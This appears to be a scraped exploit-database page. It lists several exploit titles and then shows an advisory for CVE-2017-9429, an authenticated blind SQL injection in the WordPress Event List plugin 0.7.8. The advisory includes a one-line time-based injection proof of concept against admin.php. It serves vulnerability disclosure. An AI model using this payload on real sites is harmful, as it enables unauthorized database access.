b946aa7e86
5 new exploits Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH) WarFTP 1.65 - (USER) Remote Buffer Overflow WarFTP 1.65 - 'USER' Remote Buffer Overflow Google Chrome - V8 Private Property Arbitrary Code Execution HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution WordPress Plugin WP Jobs < 1.5 - SQL Injection WordPress Plugin Event List <= 0.7.8 - SQL Injection
52 lines
941 B
Text
Executable file
52 lines
941 B
Text
Executable file
# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
|
|
# Date: 04-06-2017
|
|
# Exploit Author: Dimitrios Tsagkarakis
|
|
# Website: dtsa.eu
|
|
# Software Link: https://wordpress.org/plugins/event-list/
|
|
# Version: 0.7.8
|
|
# CVE : CVE-2017-9429
|
|
# Category: webapps
|
|
|
|
|
|
|
|
1. Description:
|
|
|
|
|
|
|
|
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
|
|
allows an authenticated user to execute arbitrary SQL commands via the id
|
|
parameter to wp-admin/admin.php.
|
|
|
|
|
|
|
|
2. Proof of Concept:
|
|
|
|
|
|
|
|
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id
|
|
=1 AND SLEEP(10)
|
|
|
|
|
|
|
|
3. Solution:
|
|
|
|
|
|
|
|
The plugin has been removed from WordPress. Deactivate the plug-in and wait
|
|
for a hotfix.
|
|
|
|
|
|
|
|
4. Reference:
|
|
|
|
|
|
|
|
http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
|
|
ction-sqli/
|
|
|
|
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
|
|
|
|
|
|
|
|
|
|
|